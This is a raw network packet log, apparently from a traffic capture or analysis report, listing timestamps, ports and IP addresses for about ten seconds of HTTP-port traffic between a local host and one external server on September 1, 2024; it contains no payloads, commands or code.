Sep 1, 2024 20:09:18.867539883 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.867556095 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.975244999 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.975315094 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.975404024 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.975431919 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.975471020 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.975503922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.975514889 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.975524902 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.975544930 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.975573063 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:18.975826025 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.975837946 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:18.975883007 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.180636883 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.180680990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.180691004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.180761099 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.180804968 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.180852890 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.180893898 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.180923939 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.180963993 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.181051016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.181062937 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.181090117 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.181104898 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.265147924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.265160084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.265249014 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.385622025 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.385643005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.385678053 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.385699987 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.385997057 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.386038065 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.386096001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.386128902 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.386135101 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.386168003 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.648639917 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.648689985 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.648701906 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.648740053 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.648763895 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.648935080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.648969889 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.649053097 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.649064064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.649072886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.649084091 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.649092913 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.649121046 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.649410963 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.649447918 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.649477005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.649487972 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.649514914 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.649524927 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.778582096 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.778664112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.778669119 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.778676987 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.778704882 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.778724909 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:19.778836012 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.778846979 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:19.778878927 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.173057079 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.173108101 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.173116922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.173234940 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.173259020 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.173274994 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.173286915 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.173300028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.173300028 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.173331022 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.173353910 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.219990015 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.220027924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.220047951 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.220069885 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.220073938 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.220113039 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.220151901 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.220197916 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.374445915 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.374459028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.374567032 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.428134918 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.428205013 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.428216934 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.428384066 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.458785057 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.458820105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.458947897 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.620970011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.621010065 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.621026039 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.621048927 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.632721901 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.632771015 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.632801056 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.632811069 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.632847071 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.705528975 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.705578089 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.705799103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.705866098 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.829358101 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.829395056 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.829804897 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.829844952 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.861931086 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.861980915 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.862010002 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.862021923 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.862050056 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.862061977 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:20.862221956 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:20.862257004 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.032891035 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.032953978 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.032974958 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.032989979 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.052874088 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.052927017 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.052961111 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.052972078 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.052995920 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.053009033 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.053432941 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.053447008 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.053478956 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.053491116 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.238337040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.238387108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.238408089 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.238420010 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.238451958 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.269534111 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.269613028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.269622087 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.269624949 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.269665003 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.269768953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.269781113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.269805908 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.269835949 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.463659048 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.463692904 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.463718891 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.463736057 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.463901997 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.463948011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:21.463951111 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:21.463993073 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.071141005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.071191072 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.071264982 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.272737980 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.272847891 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.272919893 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.358747959 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.358927965 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.359004974 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.472290039 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.472354889 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.472366095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.472424984 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.472573042 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.472584009 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.472593069 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.472604990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.472620964 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.472642899 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.674010038 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.674098015 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.674132109 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.674143076 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.674181938 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.674331903 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.674343109 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.674376965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.677071095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.677088022 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.677139044 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.875412941 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.875427008 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.875437975 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.875466108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.875492096 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:22.875948906 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.875960112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:22.876000881 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:23.278629065 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:23.278700113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:23.278712988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:23.278723001 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:23.278748035 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:23.278755903 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:23.905107975 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:23.905278921 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:23.905282974 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:23.905488968 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:24.115659952 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.115708113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.115719080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.115767002 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:24.115782022 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:24.115899086 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.115947008 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:24.200028896 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.200069904 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:24.200074911 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.200114012 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:24.581698895 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.581723928 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.581733942 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.581875086 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.581878901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:24.581887007 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.581927061 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:24.582011938 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.582022905 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.582067966 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:24.786655903 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.786719084 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:24.786748886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:24.786789894 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.243036985 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.243087053 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.243098021 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.243108034 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.243123055 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.243144989 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.243297100 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.243309021 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.243324041 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.243345022 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.243374109 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.385864019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.385921001 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.385960102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.386003017 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.470330000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.470357895 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.470513105 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.470513105 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.637523890 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.637554884 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:25.637578964 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:25.637597084 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:26.505146980 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:26.505203009 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:26.505215883 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:26.505331993 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:26.505346060 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:26.505347013 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:26.505373001 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.580842018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.580857038 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.580873966 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.580888033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.580898046 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.580921888 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.580920935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.580952883 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.580962896 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.581012964 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.581042051 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.581053019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.581089020 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.581211090 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.581268072 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.585741043 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.585797071 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.585825920 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.585871935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.585902929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.585915089 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.585956097 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.586218119 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586230040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586245060 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586266041 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.586266041 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.586292982 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.586370945 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586381912 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586391926 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586409092 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586421013 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586424112 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.586435080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586452961 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.586476088 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.586896896 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586908102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586919069 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.586946964 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.586960077 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.698796988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.698863029 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.698873997 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.699006081 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.699006081 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.699090004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.699103117 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.699146032 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.936645985 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.936660051 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.936671019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.936702013 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.936754942 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.936857939 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.936870098 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.936880112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.936892033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:27.936906099 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:27.936925888 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.132556915 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.132570028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.132580996 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.132658005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.132721901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.132721901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.132721901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:28.132754087 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.132766008 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:28.132807016 CEST	49738	80	192.168.2.4	185.215.113.16
